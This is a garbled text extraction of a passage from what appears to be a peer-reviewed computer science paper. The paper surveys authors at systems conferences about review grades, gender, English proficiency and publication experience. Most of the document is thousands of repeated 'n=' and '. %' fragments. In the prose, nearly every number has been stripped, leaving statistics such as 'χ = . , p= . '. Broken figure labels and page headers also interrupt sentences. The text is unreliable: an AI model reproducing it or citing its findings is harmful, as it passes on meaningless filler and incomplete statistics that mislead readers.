n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . . . . . overall technical presentation impact originality relevance confidence category n o rm a liz e d g ra d e figure normalized scores and response distribution. diamonds represent mean scores. bars repre- sent median scores, with a notched -pct confidence. n is the number of scores received in each category. shown below n is the percentage of conferences that used each grade category. full-size doi: . /peerjcs. /fig- conceivably, an out-of-scope paper could simply get rejected and excluded from our dataset. alternatively, this grade could be so important that papers are at a much higher risk of rejection if they are mismatched with the conference’s scope, even if they rank well in the other categories. unfortunately, without data on rejected papers we do not have enough information to discriminate between these two extremes. discussion and author diversity in this section we address differences in survey responses based on aspects of author diversity that arise from the available data. gender women represent only approximately – % of cs researchers overall (wang et al., ). in our data, the percentage is about half that, with only . % female survey respondents. what factors could explain this lower ratio? frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. one potential explanation is selection bias: women might be less inclined to respond to this survey. however, the percentage of women across respondents and nonrespondents alike, %, is actually very close. another explanation may be that women publish less than men in systems. indeed, women in our dataset did average fewer total past publications: . compared to men’s . . nevertheless, this gap is not large enough to explain the – x representation gap with the rest of cs and is not unique to systems (elsevier, ). a third explanation could be that female authors’ papers are rejected at a higher rate than males’. we cannot test this hypothesis directly without data on rejected papers. however, three pieces of evidence weaken this explanation: . the ratio of women in the double-blind conferences, where reviewers presumably remain oblivious of the authors’ gender, is in fact slightly lower than for single-blind conferences ( . % vs. . %, χ = . , p= . ). this ratio does not support an explanation that reviewers reject females at a higher rate when they can look up the author’s gender. . when we limit our observation to lead authors only, where the author’s gender may be more visible to the reviewers, the ratio of women is actually slightly higher than in the overall author population ( . % vs. . %, χ = . , p= . ). if we assume no differences in the submission rates to a conference based on gender, then female lead authors appear to suffer no more rejections than male authors. . we found no statistically significant differences in the overall acceptance grades of women and men (t = . , p= . ), even when limiting to lead authors (t = . , p= . ), papers accepted on their first attempt (t = . , p= . ), or single-blind reviews (t = . , p= . ). this equitability extends to most other grade categories, except for originality (t = . , p < . ) and technical merit in single-blind conferences (t = . , p= . ). in both categories, women scored significantly higher than men. it remains unclear whether there is any causal relationship here, and if so, in which direction; do women have to score higher than men in the technical categories to be accepted in single-blind conferences, or do women submit higher- quality papers to begin with? at any rate, this small difference is unlikely to explain the – x difference in women’s ratio compared to cs, but it does provide a case for wider adoption of double-blind reviewing. these distinctions were not the only gender differences in our survey. women also reported reviewers as somewhat more understanding, helpful, and fair than men did (χ = . , p= . , χ = . , p= . , and χ = . , p= . , respectively). on the other hand, papers authored by women averaged a few more prior submissions: . compared to men’s . (t = . , p= . ). note, however, that review quality and prior submissions are strongly linked. in other words, a paper with a longer submission history tends to rate higher on reviewer understanding, helpfulness, and fairness. when correcting for submission history length, these gender differences lose statistical significance. in summary, our data does not exhibit large statistical gender differences in the review process, and in particular it does not help to explain the large gender gap in systems. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. addressing this problem may require focusing our attention elsewhere (ceci & williams, ). english proficiency another aspect of diversity in scientific publication is english-level proficiency (lee et al., ; murray et al., ). all of the papers, reviews, and communications in our conferences were conducted in english, but many authors and reviewers are nonnative english speakers (nnes). the effective use of language can affect both reviewers’ understanding of the works and authors’ understanding of the reviews (crovella, ; editage insights, ; flowerdew, flowerdew, ). how does the author experience vary based on this factor? at least in our dataset, the answer appears to be ‘‘not much.’’ from an objective grading perspective, all but one of the review categories exhibit very similar distributions, both for teams with native english speakers and for teams with none. these categories include the presentation grade (t = . , p= . ), where language skills presumably would make the most difference. the only exception was the originality grade, where teams with no native speakers averaged a normalized grade that was slightly higher than the native speakers’ teams ( . vs. . , t = . , p= . ). as for the subjective experience of authors, nnes do feel differently about how well reviewers understand their work (χ = . , p= . ), but perhaps not in the way that we would expect; of those reviews with reportedly poor understanding, only . % were from all-nnes teams, compared to . % all-nnes teams in the better-understood reviews. the overall rate of nnes teams among survey responses was . %, so clearly most of them did not feel misunderstood. similar to women, nnes average higher prior submissions, . , compared to native speakers’ . (t = . , p= . ), which may be the stronger explanatory variable. we also tried to look in the opposite direction: how does the english level of the reviewers affect how well understood the authors feel? we do not know who reviewed whose paper, or even a reviewer’s native language or nationality. however, we can try to estimate it indirectly by looking at their affiliation’s country. we first guess the country of residence of reviewers by looking at their email affiliation, extract a country when possible, and look up whether this country includes english as one of its official languages. we then look at the conference pc overall demographics and assign each conference a value corresponding to the percent of pc members affiliated with an english-speaking country. program committees range from % english speakers (socc) to % (europar), and average . %. as it turns out, this proportion has no significant association with the reported understanding level of the reviews for the conference. these negative findings could suggest that in the overall picture of systems research, english proficiency is merely one resource in the multidimensional skill set required to publish successfully (bardi, ; ferguson, pérez-llantada & plo, ; rozycki & johnson, ) and that the binary distinction of native/nonnative speaker may be inadequate to capture even this skill alone. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . number of previous publications (log scale) p ro p o rt io n o f a u th o rs figure distribution of past publications of all authors, near the time of their first publication. full-size doi: . /peerjcs. /fig- publication experience as mentioned in the methods section, we collected data from authors’ gs profile whenever available and uniquely identifiable ( . % of our survey respondents). we can use this bibliometric data as an approximate proxy for the previous research experience of authors. for example, fig. depicts the distribution of one such metric, the number of previous publications of each author (circa their conference’s date), which appears approximately log-normal. since we collected this metric for all authors, not just survey respondents, we can compare the distributions for both populations. both distributions are similar enough to lead us to believe that no selection bias by experience occurred in this survey (t = . , p= . ). we can also look at the more complex h-index metric (hirsch, ) to evaluate differences in response rate by researcher seniority. some . % of respondents had an h- index of or less, roughly corresponding to the percentage of self-identified students. this percentage is nearly identical in the overall author population ( . %), again confirming that the large number of students in our survey is representative of the author population. this large representation of students is important in light of our previous findings about the differences between survey responses of students and of more experienced researchers. for example, students in our survey overwhelmingly prefer a rebuttal process. more experienced researchers commented in the survey that they tend to value this process less, which may affect conference policies, because those are also decided by experienced researchers. nevertheless, their high value to inexperienced researchers (as well as nnes) may render the effort worthwhile (langford, ). frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table number and percentage of survey respondents and total authors by geographical region, in descending number of total authors. region respondents percentage all authors percentage northern america . . eastern asia . . western europe . . northern europe . . southern europe . . western asia . . southern asia . . south-eastern asia . . australia and new zealand . . south america . . eastern europe . . as previously discussed, we found no correlation between the experience of a paper’s lead author and its research or submission history in months and submissions. the same 